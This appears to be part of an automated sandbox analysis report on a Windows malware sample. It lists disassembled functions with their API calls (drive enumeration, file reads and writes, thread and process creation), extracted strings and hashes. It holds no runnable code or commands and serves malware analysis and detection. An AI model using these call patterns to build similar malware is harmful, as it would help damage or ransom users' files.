      • SetEvent.KERNEL32(?), ref: 000D33E7
      • LeaveCriticalSection.KERNEL32(0000000C), ref: 000D33EA
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Event$CriticalSection$EnterLeave
      • String ID:
      • API String ID: 259983309-0
      • Opcode ID: 4fbb3b2c1ea517a1e4772d7781886224b7be0be994eb9c3d54c003075aab16b3
      • Instruction ID: b0a7a79785e39e8b89b554fab747d7664e41b2657bac6c25351ea144d03e05f0
      • Opcode Fuzzy Hash: 4fbb3b2c1ea517a1e4772d7781886224b7be0be994eb9c3d54c003075aab16b3
      • Instruction Fuzzy Hash: 6ED01776201604EFE7206B62EC88C4B7FAAEFC93613118819E49741430C736A818DF32
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D1000 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
      • GetLogicalDrives.KERNEL32 ref: 000D1015
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocDrivesInformationLogicalProcessVolume
      • String ID: X:\$i.$i.
      • API String ID: 2665412759-4186527012
      • Opcode ID: 78d8ea63dd5d00ddc9d23516aff900f51495abb0f19daf6da7b9178f348bad94
      • Instruction ID: b5b12b068af5ae94e33cd28aa26df5c820ea4a93e15ab0bcc65461cc00cd1d49
      • Opcode Fuzzy Hash: 78d8ea63dd5d00ddc9d23516aff900f51495abb0f19daf6da7b9178f348bad94
      • Instruction Fuzzy Hash: 29611A75D00309AADF15ABA4ED46BEEBBB5AF04310F24002BF500B6292DF759E90DB71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D411D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D4147
      • GetProcAddress.KERNEL32(00000000), ref: 000D414E
      • CoGetObject.OLE32(?,?,000DA1F0,?), ref: 000D41A1
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleObjectProc
      • String ID: $
      • API String ID: 4150452153-3993045852
      • Opcode ID: b0c1c33c532f85993f4898762d0bb4dc1ae23d10bc1ac6dbb89f5c9c4fd8d023
      • Instruction ID: d3e42d17e54694ad8268eb69ddbaaa379aeccb952d18e5d42ff7f416caba56fb
      • Opcode Fuzzy Hash: b0c1c33c532f85993f4898762d0bb4dc1ae23d10bc1ac6dbb89f5c9c4fd8d023
      • Instruction Fuzzy Hash: 60415771A00219EFDB10CFE0DC89AAEBBB9FF49714F50405AF905EB241D7359A45CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D1A76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
      Download Yara Rule
      APIs
      • GetLogicalDrives.KERNEL32 ref: 000D1A82
        • Part of subcall function 000D530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
        • Part of subcall function 000D5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,000D2E54), ref: 000D596A
        • Part of subcall function 000D5962: LeaveCriticalSection.KERNEL32(?), ref: 000D5973
        • Part of subcall function 000D1706: htonl.WS2_32(?), ref: 000D1774
        • Part of subcall function 000D5840: CreateThread.KERNEL32(00000000,00000000,000D56B3,00000000,00000000,00000000), ref: 000D58F2
      • CloseHandle.KERNEL32(00000000), ref: 000D1B37
      • CloseHandle.KERNEL32(00000000), ref: 000D1B6B
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateCriticalSection$CloseEventHandle$CountDrivesEnterInformationInitializeLeaveLogicalSpinThreadVolumehtonl
      • String ID: \\?\X:
      • API String ID: 1738266806-1324186152
      • Opcode ID: c1f268ad8c8f3841e547e8ca9655691086a0230abbb85d95eb8839d18733561f
      • Instruction ID: 3b8b8a1a8678c9a00ea8547bd618fae2fe771e0abaa19dd5592f4a3cd2cf5a7b
      • Opcode Fuzzy Hash: c1f268ad8c8f3841e547e8ca9655691086a0230abbb85d95eb8839d18733561f
      • Instruction Fuzzy Hash: E23192B2504701BBCB116B749C46AABBBA8BF44720F00451BFC5896393EF31D9108AB2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D1CC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110sleepCOMMON
      Download Yara Rule
      APIs
      • GetLogicalDrives.KERNEL32 ref: 000D1CD1
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
        • Part of subcall function 000D530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
        • Part of subcall function 000D5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,000D2E54), ref: 000D596A
        • Part of subcall function 000D5962: LeaveCriticalSection.KERNEL32(?), ref: 000D5973
      • GetLogicalDrives.KERNEL32 ref: 000D1D33
      • Sleep.KERNEL32(000003E8), ref: 000D1DC3
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$CreateDrivesEventLogical$CountEnterInformationInitializeLeaveSleepSpinVolume
      • String ID: \\?\ :
      • API String ID: 2297414327-2836105686
      • Opcode ID: 2eaa4d0ed96f8c6150b636b4a87820789480d671232ab4e9363dba3289f37762
      • Instruction ID: 959fddc04baa0184a2b93845b1f12649e705e75d19a05075914953a1977eb3dd
      • Opcode Fuzzy Hash: 2eaa4d0ed96f8c6150b636b4a87820789480d671232ab4e9363dba3289f37762
      • Instruction Fuzzy Hash: E331AE76904702AFC701EF60DC828AABBE5FF84351F00092BF85496362EB31DD548BB2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D489E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76processCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
        • Part of subcall function 000D5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D5B3B,00000000,00000000,00000000,000D37EB,00000000), ref: 000D5B19
      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 000D4908
      • CloseHandle.KERNEL32(?), ref: 000D491E
      • CloseHandle.KERNEL32(?), ref: 000D4923
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$CloseHeapModuleProcess$AddressAllocCreateFileNameProc
      • String ID: D
      • API String ID: 3648169817-2746444292
      • Opcode ID: ee8753fb67a382ba2c716d577e2cf854b2b49626e5cd414b7d08eded32dfbce6
      • Instruction ID: 03ca7c41ed8739be0db97c0f55cb644659fab6b16cdc986e648e1ed2d879ff5e
      • Opcode Fuzzy Hash: ee8753fb67a382ba2c716d577e2cf854b2b49626e5cd414b7d08eded32dfbce6
      • Instruction Fuzzy Hash: 7A11947290131CBFDB10ABE5EC8A9DFBFBDEB45B20F100017F604A6241DB709A458AB1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D530C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventHeap$AllocCountCriticalInitializeProcessSectionSpin
      • String ID: \\?\ :
      • API String ID: 1374596736-2836105686
      • Opcode ID: 1c3db14067633ded395933080e366c2dd4970fe0f641717e76a37c5e6735cefa
      • Instruction ID: 5f767eb7f44742b5dbf4df5f13351cca046c59fbf28c7ff78e59f8f76970efeb
      • Opcode Fuzzy Hash: 1c3db14067633ded395933080e366c2dd4970fe0f641717e76a37c5e6735cefa
      • Instruction Fuzzy Hash: C3F0A4B2700B116BEB706FA65CC1B57F6DCAB44791F14842FFA4492280C6F588408771
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D3969 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37fileCOMMON
      Download Yara Rule
      APIs
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,000DA208,00000104,?,i.,000D11AD,?,?), ref: 000D397F
      • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000D3996
      • CloseHandle.KERNEL32(00000000), ref: 000D39AB
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$CloseCreateHandleWrite
      • String ID: i.
      • API String ID: 1065093856-3455147052
      • Opcode ID: adb2dad021049678c26e7219313fd74d7081484e6d0f2be65137fafafdbf2e04
      • Instruction ID: 02b1834b5ad979dedd8ba3058f62bb3899d47ab6a3ecf3e9ad9c013c068bce1a
      • Opcode Fuzzy Hash: adb2dad021049678c26e7219313fd74d7081484e6d0f2be65137fafafdbf2e04
      • Instruction Fuzzy Hash: 90F01272202124BFDB201A669C4CDEB7E6CDB867B5B044125FD09D2190D6749E05D6B1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D56B3 Relevance: 6.1, APIs: 4, Instructions: 138synchronizationthreadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D32FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,000D56C4), ref: 000D331E
        • Part of subcall function 000D32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3371
        • Part of subcall function 000D32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D337B
        • Part of subcall function 000D32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3386
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
      • CreateThread.KERNEL32(00000000,00000001,000D54BF,?,00000000,00000000), ref: 000D5746
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D57A4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 000D57B9
      • CloseHandle.KERNEL32(?), ref: 000D57CB
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Create$Event$HandleHeapWait$AddressAllocCloseCountCriticalInitializeModuleMultipleObjectObjectsProcProcessSectionSingleSpinThread
      • String ID:
      • API String ID: 4076096208-0
      • Opcode ID: 9dbf62f23d01a3bf577c329f528d6124e27a766bbac25a85695417f66c9bfcb4
      • Instruction ID: 4ddc3a2b931f0725565bd21162e3302fcebdf13c5dcd51e2374cc0bb9672a5a1
      • Opcode Fuzzy Hash: 9dbf62f23d01a3bf577c329f528d6124e27a766bbac25a85695417f66c9bfcb4
      • Instruction Fuzzy Hash: 8C41C571608702AFD710AF64DCC6E6A77E8EF40711F20092BFD5196392EB71D9548AB2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D8B60 Relevance: 6.1, APIs: 4, Instructions: 87fileCOMMON
      Download Yara Rule
      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 000D8B7C
      • __aulldiv.LIBCMT ref: 000D8BAB
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000003,00000000), ref: 000D8BE9
      • ReadFile.KERNEL32(?,?,00040000,?,00000000), ref: 000D8C0E
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Pointer$Read__aulldiv
      • String ID:
      • API String ID: 3696392486-0
      • Opcode ID: 3589aa2553cb584311fa9a91c08798aea32ed61758ca7a6d74ba5da59c8a165e
      • Instruction ID: 0575651377c2d1a5a3de1228f5d72b9d11edda44aea046680f0ec2b2e1bb8d5f
      • Opcode Fuzzy Hash: 3589aa2553cb584311fa9a91c08798aea32ed61758ca7a6d74ba5da59c8a165e
      • Instruction Fuzzy Hash: 73314BB1D11329AFDF218FA58C44AAFBBB8EB05790F118027F904B2250D7709A41CBB1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D3772 Relevance: 6.1, APIs: 4, Instructions: 84memoryfileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,?), ref: 000D37A7
      • AllocConsole.KERNEL32 ref: 000D37C0
      • GetStdHandle.KERNEL32(000000F5), ref: 000D37C8
      • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 000D381C
        • Part of subcall function 000D90A1: GetProcessHeap.KERNEL32(00000000,000D633F,000D62A2,00000000,00000010,00000000,00000020,000D633F,00000040,000D2A6F,000DB410), ref: 000D90A7
        • Part of subcall function 000D90A1: HeapFree.KERNEL32(00000000), ref: 000D90AE
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocProcess$ConsoleCountCreateCriticalFileFreeHandleInitializeSectionSpin
      • String ID:
      • API String ID: 1040683013-0
      • Opcode ID: 8b5283e7e56d43c37734e3acacc3985a8252dfd8928dc8daec8c4ecfddba5ddc
      • Instruction ID: 2e4418b22587367e39039bc4b8fff9d55efd3744b2b18fa734d838ae1fd69768
      • Opcode Fuzzy Hash: 8b5283e7e56d43c37734e3acacc3985a8252dfd8928dc8daec8c4ecfddba5ddc
      • Instruction Fuzzy Hash: E7215772A007027AE6702A256C85BBB3A9C9F51731F040227FE15953C3DF648E8196F7
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D86B7 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
      Download Yara Rule
      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 000D86EA
      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 000D8713
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8737
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8766
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite
      • String ID:
      • API String ID: 539440098-0
      • Opcode ID: 82721bb62fa839a7cf933b96a8adfe03d8096c74c1d379834227539e2c8068e8
      • Instruction ID: 72871d027c98b3659f3a5927c50542c2b05559694ed2f48e3e718b254bc24878
      • Opcode Fuzzy Hash: 82721bb62fa839a7cf933b96a8adfe03d8096c74c1d379834227539e2c8068e8
      • Instruction Fuzzy Hash: 4321D675E0030AABDF109FA5CC84DAFBBF9EB48780F11852AE515A6250EB71DA41CF71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D32FF Relevance: 6.1, APIs: 4, Instructions: 75COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,000D56C4), ref: 000D331E
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3371
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D337B
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3386
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEvent$Heap$AllocCountCriticalInitializeProcessSectionSpin
      • String ID:
      • API String ID: 1287423427-0
      • Opcode ID: 624d4e97ceddaf376b7bf72c287a324f840793ea810b08fc37fc7c665454db9d
      • Instruction ID: 2a9561fb0bd91bd3f1260b868f8581d79a6e86266236bc193ac43a671addddde
      • Opcode Fuzzy Hash: 624d4e97ceddaf376b7bf72c287a324f840793ea810b08fc37fc7c665454db9d
      • Instruction Fuzzy Hash: BA215EB16013019FD7709F669AC5B56FAE8BF44740F41442FF28997681CBB1DA408B72
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D4FA9 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountTick$select
      • String ID:
      • API String ID: 2350311442-0
      • Opcode ID: e932c7b976e07e947bab671fff37fa5fcc845a970d61b401e75a0cf689c466e1
      • Instruction ID: 10ef1b16d2a303cdba0eb88313f150ff3a08c7ff5d504ad87a42753a5c1c1cd2
      • Opcode Fuzzy Hash: e932c7b976e07e947bab671fff37fa5fcc845a970d61b401e75a0cf689c466e1
      • Instruction Fuzzy Hash: 9B111FB1D0022DABDB14DFA4DC85ADEB7BCEF09700F1041A7E704E6290D6749A458FE1
      Uniqueness

      Uniqueness Score: -1.00%

